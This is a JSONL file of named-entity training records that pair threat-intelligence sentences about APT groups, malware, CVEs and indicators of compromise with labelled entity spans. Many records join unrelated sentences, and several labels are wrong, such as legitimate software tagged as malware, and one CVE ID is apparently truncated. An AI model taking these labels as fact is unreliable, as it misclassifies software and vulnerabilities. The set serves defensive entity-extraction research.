{"text": "Moving through the infection process , NetWitness Endpoint detects the initial exploit CVE-2017-1182 in action as the Microsoft Equation Editor , EQNEDT32.exe , scores high for potentially malicious activity . Execute a command through exploits for CVE-2018-0802 .", "spans": {"VULNERABILITY: CVE-2017-1182": [[87, 100]], "MALWARE: Microsoft Equation Editor": [[118, 143]], "MALWARE: EQNEDT32.exe": [[146, 158]], "VULNERABILITY: CVE-2018-0802": [[249, 262]]}, "info": {"id": "cyberner_stix_train_004559", "source": "cyberner_stix_train"}}
{"text": "The product information in the builder kit matched with this individual ’s YouTube username and the YouTube channel .", "spans": {"ORGANIZATION: YouTube": [[75, 82], [100, 107]]}, "info": {"id": "cyberner_stix_train_004560", "source": "cyberner_stix_train"}}
{"text": "Found bundled with a repackaged app , the spyware ’ s surveillance capabilities involve hiding its presence on the device , recording phone calls , logging incoming text messages , recoding videos , taking pictures and collecting GPS coordinates , then broadcasting all of that to an attacker-controlled C & C ( command and control ) server . In early August , the SectorJ04 group carried out extensive hacking activities targeting the users around the world , including South Korea , India , Britain , the United States , Germany , Canada , Argentina , Bangladesh and Hong Kong . Sensitive bank documents have be found on the servers that were controlling Carbanak .", "spans": {"SYSTEM: GPS": [[230, 233]], "THREAT_ACTOR: SectorJ04": [[365, 374]], "MALWARE: Carbanak": [[657, 665]]}, "info": {"id": "cyberner_stix_train_004561", "source": "cyberner_stix_train"}}
{"text": "Mobile developers have recently begun eschewing traditional app stores and instead want to deliver their software directly through their own means . As part of its ongoing research initiatives , the Anomali Threat Research Team has discovered a new phishing attack leveraging spoof sites that seem to be designed to steal email credentials from the target victims within the government of the People’s Republic of China . APT33 's focus on aviation may indicate the group 's desire to gain insight into regional military capabilities to enhance Iran 's aviation capabilities or to support Iran 's military and strategic decision making .", "spans": {"ORGANIZATION: Anomali": [[199, 206]], "THREAT_ACTOR: APT33": [[422, 427]], "ORGANIZATION: aviation": [[440, 448]], "ORGANIZATION: military": [[512, 520], [597, 605]]}, "info": {"id": "cyberner_stix_train_004562", "source": "cyberner_stix_train"}}
{"text": "This means that untrusted software may not be allowed to run unless it is signed .", "spans": {}, "info": {"id": "cyberner_stix_train_004563", "source": "cyberner_stix_train"}}
{"text": "When rooting fails , a second component delivers a fake system update notification in hopes of tricking users into granting HummingBad system-level permissions . WannaCry ( also known as WCry or WanaCryptor ) malware is a self-propagating ( worm-like ) ransomware that spreads through internal networks and over the public internet by exploiting a vulnerability in Microsoft 's Server Message Block ( SMB ) protocol , MS17-010 . APT33 : 64.251.19.215 [REDACTED].myftp.org . The group 's 91 attacks come not long after their extensive GoAnywhere campaign in March , when they hit over 100 organizations using a nasty zero - day .", "spans": {"MALWARE: HummingBad": [[124, 134]], "TOOL: WannaCry": [[162, 170]], "TOOL: WCry": [[187, 191]], "TOOL: WanaCryptor": [[195, 206]], "TOOL: ransomware": [[253, 263]], "ORGANIZATION: Microsoft": [[365, 374]], "TOOL: Server Message Block": [[378, 398]], "TOOL: SMB": [[401, 404]], "THREAT_ACTOR: APT33": [[429, 434]], "IP_ADDRESS: 64.251.19.215": [[437, 450]], "DOMAIN: [REDACTED].myftp.org": [[451, 471]], "THREAT_ACTOR: The group 's 91 attacks": [[474, 497]], "MALWARE: nasty zero - day": [[610, 626]]}, "info": {"id": "cyberner_stix_train_004564", "source": "cyberner_stix_train"}}
{"text": "SHA256 Package Name App Name a6c7351b09a733a1b3ff8a0901c5bde fdc3b566bfcedcdf5a338c3a97c9f249b com.android.henbox 备份 ( Backup ) Table 3 HenBox variant used in description Once this variant of HenBox is installed on the victim ’ s device , the app can be executed in two different ways : One method for executing HenBox is for the victim to launch the malicious app ( named “ Backup ” , in Since 2017 , APT41 has consistently targeted telecommunications companies , possibly a crucial first step to establish a foothold in targeting a particular region . While TG-4127 continues to primarily threaten organizations and individuals operating in Russia and former Soviet states , this campaign illustrates its willingness to expand its scope to other targets that have intelligence of interest to the Russian government .", "spans": {"MALWARE: HenBox": [[136, 142], [192, 198], [312, 318]], "THREAT_ACTOR: APT41": [[402, 407]], "ORGANIZATION: telecommunications companies": [[434, 462]], "THREAT_ACTOR: TG-4127": [[560, 567]], "ORGANIZATION: Russian government": [[798, 816]]}, "info": {"id": "cyberner_stix_train_004565", "source": "cyberner_stix_train"}}
{"text": "In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload . A timeline of new activity can be scoped out for the group , with the greatest number of related downloaders created by the developers in December 2011 , Feb and March of 2012 , followed by June of 2012 .", "spans": {"ORGANIZATION: government officials": [[28, 48]], "MALWARE: malicious Microsoft Word document": [[90, 123]], "VULNERABILITY: CVE-2012-0158": [[143, 156]]}, "info": {"id": "cyberner_stix_train_004566", "source": "cyberner_stix_train"}}
{"text": "In this version , the developer added more classes from the same package . some indications of loosely linked activity dating back to at least 2013 . Similar to RIPTIDE campaigns , APT12 infects target systems with HIGHTIDE using a Microsoft Word ( .doc ) document that exploits CVE-2012-0158 . WIRTE has used HTTPS over ports 2083 and 2087 for C2.ZxShell can use ports 1985 and 1986 in HTTP / S communication.[47 ] Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level .", "spans": {"MALWARE: RIPTIDE": [[161, 168]], "THREAT_ACTOR: APT12": [[181, 186]], "MALWARE: HIGHTIDE": [[215, 223]], "ORGANIZATION: Microsoft": [[232, 241]], "TOOL: Word": [[242, 246]], "FILEPATH: .doc": [[249, 253]], "VULNERABILITY: CVE-2012-0158": [[279, 292]], "MALWARE: WIRTE": [[295, 300]], "SYSTEM: HTTPS": [[310, 315]], "MALWARE: C2.ZxShell": [[345, 355]]}, "info": {"id": "cyberner_stix_train_004567", "source": "cyberner_stix_train"}}
{"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf.exe as the only content of the ZIP . However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": {"ORGANIZATION: Lookout": [[0, 7]], "MALWARE: Desert Scorpion": [[93, 108]], "SYSTEM: Google Play Store": [[116, 133]], "THREAT_ACTOR: HIDDEN COBRA actors": [[167, 186]], "TOOL: DDoS botnets": [[195, 207]], "TOOL: keyloggers": [[210, 220]], "TOOL: remote access tools": [[223, 242]], "TOOL: RATs": [[245, 249]], "TOOL: wiper malware": [[258, 271]], "TOOL: PowerArchiver 2019": [[297, 315]], "TOOL: WinRar": [[320, 326]], "FILEPATH: SHIPPING_MX00034900_PL_INV_pdf.exe": [[375, 409]]}, "info": {"id": "cyberner_stix_train_004568", "source": "cyberner_stix_train"}}
{"text": "The loaders associated with the PinchDuke toolset have also been observed being used with CosmicDuke .", "spans": {"TOOL: loaders": [[4, 11]], "MALWARE: PinchDuke": [[32, 41]], "MALWARE: CosmicDuke": [[90, 100]]}, "info": {"id": "cyberner_stix_train_004569", "source": "cyberner_stix_train"}}
{"text": "NetWire , DarkComet , NanoCore , LuminosityLink , Remcos and Imminent Monitor are all designed to provide remote access to compromised systems . In all cases , based on the nature of the computers infected by Thrip , it appeared that the telecoms companies themselves and not their customers were the targets of these attacks .", "spans": {"TOOL: NetWire": [[0, 7]], "TOOL: DarkComet": [[10, 19]], "TOOL: NanoCore": [[22, 30]], "TOOL: LuminosityLink": [[33, 47]], "TOOL: Remcos": [[50, 56]], "TOOL: Imminent Monitor": [[61, 77]], "ORGANIZATION: telecoms companies": [[238, 256]], "ORGANIZATION: customers": [[282, 291]]}, "info": {"id": "cyberner_stix_train_004570", "source": "cyberner_stix_train"}}
{"text": "This final payload was designed to run only on certain systems .", "spans": {}, "info": {"id": "cyberner_stix_train_004571", "source": "cyberner_stix_train"}}
{"text": "APT33 has targeted organizations – spanning multiple industries – headquartered in the United States , Saudi Arabia and South Korea . In 2013 , a public report reveals a group of actors conducted targeted attacks leverage a malware dubbed ICEFOG against mainly government organizations and defense industry of South Korea and Japan .", "spans": {"THREAT_ACTOR: APT33": [[0, 5]], "ORGANIZATION: spanning multiple industries": [[35, 63]], "MALWARE: ICEFOG": [[239, 245]], "ORGANIZATION: government organizations": [[261, 285]], "ORGANIZATION: defense industry": [[290, 306]]}, "info": {"id": "cyberner_stix_train_004572", "source": "cyberner_stix_train"}}
{"text": "The backdoor can connect to any of the C&Cs from a hardcoded list – a measure to increase resilience . Both of these samples work as Banking Trojans and provide similar functionalities .", "spans": {"MALWARE: backdoor": [[4, 12]], "MALWARE: Banking Trojans": [[133, 148]]}, "info": {"id": "cyberner_stix_train_004573", "source": "cyberner_stix_train"}}
{"text": "This once more highlights two crucial behavioral elements of the Dukes group .", "spans": {"THREAT_ACTOR: Dukes": [[65, 70]]}, "info": {"id": "cyberner_stix_train_004574", "source": "cyberner_stix_train"}}
{"text": "Implementing input validation can protect against the security flaws of web applications by significantly reducing the probability of successful exploitation .", "spans": {}, "info": {"id": "cyberner_stix_train_004575", "source": "cyberner_stix_train"}}
{"text": "Interestingly , we found other DNS records mostly from 2017 that follow a similar pattern and appear to contain two-letters codes for districts in Italy : Server City server1bo.exodus.connexxa [ . Additionally , the actor possibly gained a foothold on other target networks—beyond the two intrusions discussed in this post – using similar strategies . A shortcut is added to the the startup folder : C:\\Users\\User\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup . Indicators of compromise IOCs are pieces of forensic data , such as data found in system log entries or files , that identify potentially malicious activity on a system or network .", "spans": {}, "info": {"id": "cyberner_stix_train_004576", "source": "cyberner_stix_train"}}
{"text": "This may also explain the timing in between the apps becoming fully functional and “ incubation. ” As this is a group we have not observed before , we will continue monitoring this campaign for further developments . The GCMAN group has moved beyond banks and is now targeting the budgeting and accounting departments in any organization of interest to them , using the same APT-style tools and techniques . it updates the CFG and the destination of the instruction . This also ties into the fact that cyber criminals are competitive by nature , and they love the challenge their actions bring .", "spans": {"THREAT_ACTOR: GCMAN group": [[221, 232]], "ORGANIZATION: banks": [[250, 255]], "ORGANIZATION: budgeting": [[281, 290]], "ORGANIZATION: accounting departments": [[295, 317]], "THREAT_ACTOR: cyber criminals": [[502, 517]]}, "info": {"id": "cyberner_stix_train_004577", "source": "cyberner_stix_train"}}
{"text": "TRISIS was an escalation of the type of attacks historically targeting ICS systems .", "spans": {"MALWARE: TRISIS": [[0, 6]], "TOOL: ICS": [[71, 74]]}, "info": {"id": "cyberner_stix_train_004578", "source": "cyberner_stix_train"}}
{"text": "The author has introduced the capability to grant the app the device admin permission . That attack was attributed to perpetrators Kaspersky called the Winnti Group . Invader ( a.k.a Kickesgo ) is a backdoor that injects its main code into a legitimate process , such as explorer.exe , and has following functions :", "spans": {"ORGANIZATION: Kaspersky": [[131, 140]], "THREAT_ACTOR: Winnti Group": [[152, 164]], "MALWARE: Invader": [[167, 174]], "MALWARE: Kickesgo": [[183, 191]], "FILEPATH: explorer.exe": [[271, 283]]}, "info": {"id": "cyberner_stix_train_004579", "source": "cyberner_stix_train"}}
{"text": "In addition to these , the Animal Farm attackers used at least one unknown , mysterious malware during an operation targeting computer users in Burkina Faso . Carbanak has its origin in more common financial fraud including theft from consumer and corporate bank accounts in Europe and Russia , using standard banking malware , mainly Carberp .", "spans": {"ORGANIZATION: users": [[135, 140]], "MALWARE: Carbanak": [[159, 167]], "ORGANIZATION: consumer": [[235, 243]], "MALWARE: Carberp": [[335, 342]]}, "info": {"id": "cyberner_stix_train_004580", "source": "cyberner_stix_train"}}
{"text": "Some example file names using this technique include : AntiVirus_update_package.7z , acquisition.7z , offer.7z , update_flashplayer10ax.7z .", "spans": {"FILEPATH: AntiVirus_update_package.7z": [[55, 82]], "FILEPATH: acquisition.7z": [[85, 99]], "FILEPATH: offer.7z": [[102, 110]], "FILEPATH: update_flashplayer10ax.7z": [[113, 138]]}, "info": {"id": "cyberner_stix_train_004581", "source": "cyberner_stix_train"}}
{"text": "( control the vibrator ) ∗ android.permission.ACCESS_WIFI_STATE ( view information about the status of Wi-Fi ) ∗ android.permission.WRITE_SMS ( edit/delete SMS ) ∗ android.permission.ACCESS_NETWORK_STATE ( view the status of all networks ) ∗ android.permission.WAKE_LOCK ( prevent the phone from going to sleep ) ∗ android.permission.GET_TASKS ( retrieve running applications ) ∗ android.permission.CALL_PHONE ( call phone numbers ) One of the top targets is the Japan Pension Service , but the list of targeted industries includes government and government agencies , local governments , public interest groups , universities , banks , financial services , energy and so on . The threat posed by ZxShell to organizations is one that cannot be ignored . A possible solution would come from adaptive URLs , adding the ID as part of the URL or subdomain to allow admins to set CSP rules that restrict data exfiltration to other accounts .", "spans": {"ORGANIZATION: Pension Service": [[469, 484]], "ORGANIZATION: government": [[532, 542]], "ORGANIZATION: government agencies": [[547, 566]], "ORGANIZATION: local governments": [[569, 586]], "ORGANIZATION: public interest groups": [[589, 611]], "ORGANIZATION: universities": [[614, 626]], "ORGANIZATION: banks": [[629, 634]], "ORGANIZATION: financial services": [[637, 655]], "ORGANIZATION: energy": [[658, 664]], "MALWARE: ZxShell": [[697, 704]]}, "info": {"id": "cyberner_stix_train_004582", "source": "cyberner_stix_train"}}
{"text": "Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands , but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date .", "spans": {"MALWARE: HammerDuke": [[5, 15], [120, 130]], "TOOL: C&C": [[50, 53]], "TOOL: Twitter": [[188, 195]]}, "info": {"id": "cyberner_stix_train_004583", "source": "cyberner_stix_train"}}
{"text": "] it Reggio Calabria server2ct.exodus.connexxa [ . Adversary behavioral artifacts further suggest the TEMP.Veles operators are based in Moscow , lending some further support to the scenario that CNIIHM , a Russian research organization in Moscow , has been involved in TEMP.Veles activity . cname : Combating malware , ransomware , and malicious cyber attacks has always relied on information sharing , exposure of actors TTPs and the dissemination of reliable threat intelligence so that security professionals can quickly develop mitigations , remediations , and update their defenses to block future attacks .", "spans": {"THREAT_ACTOR: TEMP.Veles": [[102, 112], [269, 279]], "THREAT_ACTOR: CNIIHM": [[195, 201]], "ORGANIZATION: research organization": [[214, 235]]}, "info": {"id": "cyberner_stix_train_004584", "source": "cyberner_stix_train"}}
{"text": "Specifically , the techniques CosmicDuke uses to extract user credentials from targeted software and to detect the presence of analysis tools appear to be based on the techniques used by PinchDuke .", "spans": {"MALWARE: CosmicDuke": [[30, 40]], "MALWARE: PinchDuke": [[187, 196]]}, "info": {"id": "cyberner_stix_train_004586", "source": "cyberner_stix_train"}}
{"text": "Android documentation describes that function as \" a global action . This blog post analyzes several recent Molerats attacks that deployed PIVY against targets in the Middle East and in the U.S. We also examine additional PIVY attacks that leverage Arabic-language content related to the ongoing crisis in Egypt and the wider Middle East to lure targets into opening malicious files . Rancor : Cyber Espionage Group Uses New Custom Malware to Attack Southeast Asia . The ransom note is also used to generate a message in the form of the background wallpaper typically located at “ C:/Users / Public / bg.jpg ” .", "spans": {"SYSTEM: Android": [[0, 7]], "TOOL: PIVY": [[139, 143]], "MALWARE: malicious files": [[367, 382]], "THREAT_ACTOR: Rancor": [[385, 391]]}, "info": {"id": "cyberner_stix_train_004587", "source": "cyberner_stix_train"}}
{"text": "Ransomware that has been publicly named \" WannaCry \" , \" WCry \" or \" WanaCrypt0r \" ( based on strings in the binary and encrypted files ) has spread to at least 74 countries as of Friday 12 May 2017 , reportedly targeting Russia initially , and spreading to telecommunications , shipping , car manufacturers , universities and health care industries , among others . Based on information collected in the course of this research , the targets and victims of Infy 's campaigns have continued to be strongly aligned with Iran 's \" soft war \" agenda , internal security policies , and regional adversaries of the hardline establishment of the Islamic Republic of Iran .", "spans": {"TOOL: WannaCry": [[42, 50]], "TOOL: WCry": [[57, 61]], "TOOL: WanaCrypt0r": [[69, 80]], "ORGANIZATION: telecommunications": [[258, 276]], "ORGANIZATION: shipping": [[279, 287]], "ORGANIZATION: car manufacturers": [[290, 307]], "ORGANIZATION: universities": [[310, 322]], "ORGANIZATION: health care industries": [[327, 349]]}, "info": {"id": "cyberner_stix_train_004588", "source": "cyberner_stix_train"}}
{"text": "Cerberus embeds the following set of features that allows itself to remain under the radar and successfully perform attacks : Overlaying : Dynamic ( Local injects obtained from C2 ) Keylogging SMS harvesting : SMS listing SMS harvesting : SMS forwarding Device info collection Contact list collection Application listing Location collection Overlaying : Targets list update SMS : Sending Calls : USSD request making Calls : Call forwarding Remote actions : App installing Remote actions : App starting Remote actions : App removal Remote actions : Showing arbitrary web pages Remote actions : Screen-locking Although the SectorJ04 group mainly targeted countries located in Europe or North America , it has recently expanded its field of activities to countries located in Southeast Asia and East Asia . Secureworks® incident responders and Counter Threat Unit™ ( CTU ) researchers investigated activities associated with the BRONZE BUTLER ( also known as Tick ) threat group , which likely originates in the People .", "spans": {"MALWARE: Cerberus": [[0, 8]], "THREAT_ACTOR: SectorJ04": [[621, 630]], "ORGANIZATION: Secureworks®": [[804, 816]], "ORGANIZATION: CTU": [[864, 867]], "THREAT_ACTOR: BRONZE BUTLER": [[926, 939]], "THREAT_ACTOR: Tick": [[956, 960]]}, "info": {"id": "cyberner_stix_train_004589", "source": "cyberner_stix_train"}}
{"text": "In comparison , even the earliest known GeminiDuke samples encrypted any strings that might have given away the malware ’s true nature .", "spans": {"MALWARE: GeminiDuke": [[40, 50]]}, "info": {"id": "cyberner_stix_train_004590", "source": "cyberner_stix_train"}}
{"text": "It uses “ 185.51.201 [ . However , the final payload is something that welivesecurity have never seen associated with Buhtrap . ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": {"ORGANIZATION: welivesecurity": [[71, 85]], "THREAT_ACTOR: Buhtrap": [[118, 125]], "THREAT_ACTOR: ScarCruft": [[128, 137]], "FILEPATH: C781f5fad9b47232b3606e4d374900cd": [[146, 178]], "TOOL: Installer": [[179, 188]]}, "info": {"id": "cyberner_stix_train_004591", "source": "cyberner_stix_train"}}
{"text": "We named this malware \" WolfRAT '' due to strong links between this malware ( and the command and control ( C2 ) infrastructure ) and Wolf Research , an infamous organization that developed interception and espionage-based malware and was publicly described by CSIS during Virus Bulletin 2018 . In this blog , we look at the Winnti malware implant as used by two known activity groups BARIUM and LEAD . The emails are often tailored for specific victims and contain malicious attachments that are almost always “ weaponized ” .PDF files with known exploits that drop malware executables onto targeted systems . This will essentially create a client - side WAF that can enforce a policy on where specific data field are allowed to be transmitted .", "spans": {"MALWARE: WolfRAT": [[24, 31]], "ORGANIZATION: Wolf Research": [[134, 147]], "TOOL: Winnti malware": [[325, 339]], "THREAT_ACTOR: BARIUM": [[385, 391]], "TOOL: emails": [[407, 413]], "FILEPATH: .PDF": [[526, 530]]}, "info": {"id": "cyberner_stix_train_004592", "source": "cyberner_stix_train"}}
{"text": "] com/gate_cb8a5aea1ab302f0_c offline 31.214.157 [ . These could be tools to circumvent internet censorship , such as Softether VPN 4.12” and psiphon3” , or Microsoft Office activators” . Wapack labs also observed a similar sample targeting Japan in November .", "spans": {"MALWARE: Softether VPN 4.12”": [[118, 137]], "MALWARE: psiphon3”": [[142, 151]], "MALWARE: Microsoft Office activators”": [[157, 185]], "ORGANIZATION: Wapack": [[188, 194]]}, "info": {"id": "cyberner_stix_train_004593", "source": "cyberner_stix_train"}}
{"text": "This certificate configuration is ignored by the malware .", "spans": {}, "info": {"id": "cyberner_stix_train_004594", "source": "cyberner_stix_train"}}
{"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . As we have noted in many earlier reports , attackers commonly use decoy files to trick victims into thinking a malicious document is actually legitimate .", "spans": {"VULNERABILITY: zero-day": [[54, 62]], "THREAT_ACTOR: TEMP.Reaper": [[110, 121]], "FILEPATH: decoy files": [[190, 201]]}, "info": {"id": "cyberner_stix_train_004595", "source": "cyberner_stix_train"}}
{"text": "Most components are obfuscated in some way , whether it be simple XOR with a single-byte key , or through the use of ZIP or Zlib compression wrapped with RC4 encryption . Since 2017 , APT41's activities have included a series of supply chain compromises . We assess that APT28 is most likely sponsored by the Russian government .", "spans": {"SYSTEM: ZIP": [[117, 120]], "SYSTEM: Zlib": [[124, 128]], "THREAT_ACTOR: APT41's": [[184, 191]], "THREAT_ACTOR: APT28": [[271, 276]], "ORGANIZATION: Russian government": [[309, 327]]}, "info": {"id": "cyberner_stix_train_004596", "source": "cyberner_stix_train"}}
{"text": "Criminals are increasingly using obfuscation , the deliberate act of creating complex code to make it difficult to analyze . LAS VEGAS—Today at the Black Hat information security conference , Dell SecureWorks researchers unveiled a report on a newly detected hacking group that has targeted companies around the world while stealing massive amounts of industrial data . The difference between the original and patched hpqhvind.exe . Paired with KillNet ’s reported compromise and leak of North Atlantic Treaty Organization ( NATO ) documents , this sudden increase in capability could indicate significant investment from more sophisticated actors , particularly when measured against KillNet ’s capabilities since the collective ’s inception in late 2021 .", "spans": {"ORGANIZATION: Dell SecureWorks": [[192, 208]], "FILEPATH: hpqhvind.exe": [[418, 430]]}, "info": {"id": "cyberner_stix_train_004597", "source": "cyberner_stix_train"}}
{"text": "New malware is often introduced to underground communities by being promoted and sold or offered as a giveaway . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . As the Rocket Kitten group 's behavior was well characterized in previous publications ( see the recent report from Trend Micro and ClearSky ) .", "spans": {"MALWARE: TajMahal": [[132, 140]], "ORGANIZATION: Kaspersky": [[175, 184]], "THREAT_ACTOR: Rocket Kitten group": [[262, 281]], "ORGANIZATION: Trend Micro": [[371, 382]], "ORGANIZATION: ClearSky": [[387, 395]]}, "info": {"id": "cyberner_stix_train_004598", "source": "cyberner_stix_train"}}
{"text": "PLATINUM has used several zero-day exploits against their victims . Execute a command through exploits for CVE-2017-11882 .", "spans": {"THREAT_ACTOR: PLATINUM": [[0, 8]], "VULNERABILITY: zero-day exploits": [[26, 43]], "VULNERABILITY: CVE-2017-11882": [[107, 121]]}, "info": {"id": "cyberner_stix_train_004599", "source": "cyberner_stix_train"}}
{"text": "Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection . Through our continuous monitoring of threats during 2018 , we observed a new wave of attacks by Gaza Cybergang Group1 targeting embassies and political personnel .", "spans": {"MALWARE: Canhadr/Ndriver": [[29, 44]], "THREAT_ACTOR: Gaza Cybergang Group1": [[347, 368]], "ORGANIZATION: embassies": [[379, 388]], "ORGANIZATION: political personnel": [[393, 412]]}, "info": {"id": "cyberner_stix_train_004600", "source": "cyberner_stix_train"}}
{"text": "To successfully interact with the web shell , a threat actor sent HTTP requests that included the \"|\" parameter .", "spans": {}, "info": {"id": "cyberner_stix_train_004601", "source": "cyberner_stix_train"}}
{"text": "In one sample , no SMS-related code appears in the DEX file , but there is a native method registered . Over the summer they compromised several sites , including a well-known Uyghur website written in that native language . End Terminate ZxShell DLL . In terms of the fallout , it ’s tough to overstate the havoc Cl0p was able to wreck thanks to the zero - day .", "spans": {"MALWARE: ZxShell": [[239, 246]], "TOOL: DLL": [[247, 250]], "THREAT_ACTOR: Cl0p": [[314, 318]], "VULNERABILITY: zero - day": [[351, 361]]}, "info": {"id": "cyberner_stix_train_004602", "source": "cyberner_stix_train"}}
{"text": "The Flash exploit is served from unobfuscated HTML/JS .", "spans": {"TOOL: Flash": [[4, 9]], "TOOL: HTML/JS": [[46, 53]]}, "info": {"id": "cyberner_stix_train_004603", "source": "cyberner_stix_train"}}
{"text": "Dynamic code loading makes it impossible to state what kind of PHA it was . This newly observed activity uses a series of redirections and fileless , malicious implementations of legitimate tools to gain access to the targeted systems . This variant sends an HTTP request to a legitimate Japanese website using a malformed User-Agent string , as shown in Figure 2 . • New , unexpected compiled ASPX files in the directory • Reconnaissance , vulnerability - testing requests to the following resources from an external IP address : In our investigations to date , the web shells placed on Exchange Servers have been named differently in each intrusion , and thus the file name alone is not a high - fidelity indicator of compromise .", "spans": {"TOOL: User-Agent": [[323, 333]], "SYSTEM: Exchange Servers": [[588, 604]]}, "info": {"id": "cyberner_stix_train_004604", "source": "cyberner_stix_train"}}
{"text": "Encrypt the collected data and send it to the attackers over the HTTP protocol .", "spans": {}, "info": {"id": "cyberner_stix_train_004605", "source": "cyberner_stix_train"}}
{"text": "Based on this information it can be concluded that espionage actors used this individual ’s modified version of njRAT in this cyber attack .", "spans": {"MALWARE: njRAT": [[112, 117]]}, "info": {"id": "cyberner_stix_train_004606", "source": "cyberner_stix_train"}}
{"text": "For example , in addition to compromising high value domain controllers and security servers , the threat actor has also been observed identifying and subsequently installing malware on low profile systems that provide non-critical support functions to the business , and are thus less likely to draw the attention of system administrators . There is often a singular focus from the security community on ICS malware largely due to its novel nature and the fact that there are very few examples found in the wild .", "spans": {"THREAT_ACTOR: threat actor": [[99, 111]], "ORGANIZATION: security community": [[383, 401]], "MALWARE: ICS": [[405, 408]], "MALWARE: malware": [[409, 416]]}, "info": {"id": "cyberner_stix_train_004607", "source": "cyberner_stix_train"}}
{"text": "This class is based on public code belonging to the package praeda.muzikmekan , which can be found here among other places . registrant information points to activity possibly as early as 2011 . However , the WATERSPOUT campaign shared several traits with the RIPTIDE and HIGHTIDE campaign that we have attributed to APT12 . Emotet has used HTTP over ports such as 20 , 22 , 7080 , and 50000 , in addition to using ports commonly associated with HTTP / S.[13 ] FIN7 has used port - protocol mismatches on ports such as 53 , 80 , 443 , and 8080 during C2.[14 ]", "spans": {"MALWARE: WATERSPOUT": [[209, 219]], "MALWARE: RIPTIDE": [[260, 267]], "MALWARE: HIGHTIDE": [[272, 280]], "THREAT_ACTOR: APT12": [[317, 322]], "THREAT_ACTOR: FIN7": [[461, 465]]}, "info": {"id": "cyberner_stix_train_004608", "source": "cyberner_stix_train"}}
{"text": "EXECUTIVE SUMMARY Cisco Talos has discovered a new Android malware based on a leak of the DenDroid malware family . Finally , this geo-location supports the likely theory that the attackers behind Kimsuky are based in North Korea . The IXESHE campaign makes use of targeted emails with malicious attachments to compromise victims ’ systems . A more granular future direction for strengthening CSP direction to consider as part of the CSP standard is XHR proxy enforcement .", "spans": {"ORGANIZATION: Cisco Talos": [[18, 29]], "MALWARE: DenDroid": [[90, 98]], "THREAT_ACTOR: Kimsuky": [[197, 204]], "THREAT_ACTOR: IXESHE": [[236, 242]], "TOOL: emails": [[274, 280]]}, "info": {"id": "cyberner_stix_train_004609", "source": "cyberner_stix_train"}}
{"text": "That communication is an Achilles heel for any botnet – it may raise suspicion and , cutting the bots off is always lethal to the botnet ’ s functioning . This activity ceased in February 2016 , likely because the men who made up Scattered Canary began to focus on honing their BEC skills . Symantec also confirmed seeing the Lazarus wiper tool in Poland at one of their customers .", "spans": {"THREAT_ACTOR: Scattered Canary": [[230, 246]], "ORGANIZATION: Symantec": [[291, 299]], "THREAT_ACTOR: Lazarus": [[326, 333]], "ORGANIZATION: customers": [[371, 380]]}, "info": {"id": "cyberner_stix_train_004610", "source": "cyberner_stix_train"}}
{"text": "These services appear to be running on all network interfaces and are therefore accessible to anyone sharing a local network with an infected device . The certificates Blackfly stole were also from South Korean companies , primarily in the video game and software development industry . Describes a resolution by the Asian Parliamentary Assembly ( APA ) held in Anatalya , announcing unlimited support for the Palestinian people 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c . jalsa.rar : The attackers behind Earth Vetala use features of remote access software to steal sensitive information or download malware for additional cyber operations , leveraging spearphishing emails and lure documents containing embedded links to a legitimate filesharing service Onehub to distribute archives containing the ScreenConnect remote administrator tool and RemoteUtilities software .", "spans": {"ORGANIZATION: companies": [[211, 220]], "ORGANIZATION: video game and software development industry": [[240, 284]], "ORGANIZATION: Asian Parliamentary Assembly": [[317, 345]], "ORGANIZATION: APA": [[348, 351]], "FILEPATH: 7b4c736b92ce702fb584845380e237aa55ddb4ef693ea65a766c9d9890b3852c": [[429, 493]], "FILEPATH: jalsa.rar": [[496, 505]], "TOOL: Onehub": [[779, 785]], "TOOL: ScreenConnect remote administrator tool": [[824, 863]], "TOOL: RemoteUtilities software": [[868, 892]]}, "info": {"id": "cyberner_stix_train_004611", "source": "cyberner_stix_train"}}
{"text": "We believe that this method is engineered to avoid trivial detection of process injection using the well-detected CreateRemoteThread or ZwQueueApcThread API . The Rocket Kitten attacker group 's main attack vector is spear-phishing . The shellcode is obfuscated using OceanLotus ’s standard approach of flattening the control flow and inserting junk opcodes ( as described in the ESET white paper on OceanLotus ) . For example , analysts need to consider during analysis whether the appliance is recording the true client IP addresses ( opposed to network address translation [ NAT ] addresses ) , and what normal user behavior looks like ( do users shift IP addresses frequently ) .", "spans": {"THREAT_ACTOR: Rocket Kitten": [[163, 176]], "THREAT_ACTOR: attacker group": [[177, 191]], "THREAT_ACTOR: OceanLotus": [[268, 278], [400, 410]], "ORGANIZATION: ESET": [[380, 384]]}, "info": {"id": "cyberner_stix_train_004612", "source": "cyberner_stix_train"}}
{"text": "Notably , all of the content text is accessible to the victim even before macros are enabled .", "spans": {"TOOL: macros": [[74, 80]]}, "info": {"id": "cyberner_stix_train_004613", "source": "cyberner_stix_train"}}
{"text": "Sofacy ’s August 2015 attack wave .", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]]}, "info": {"id": "cyberner_stix_train_004614", "source": "cyberner_stix_train"}}
{"text": "App Icon Figure 1 : App icon and fake notification . The ShooterAudio module uses PulseAudio to capture audio from the user's microphone . Winnti ver.1 , these values were designated as ‘ tag ’ and ‘ group ’ .", "spans": {"MALWARE: ShooterAudio module": [[57, 76]], "TOOL: PulseAudio": [[82, 92]], "MALWARE: Winnti": [[139, 145]]}, "info": {"id": "cyberner_stix_train_004615", "source": "cyberner_stix_train"}}
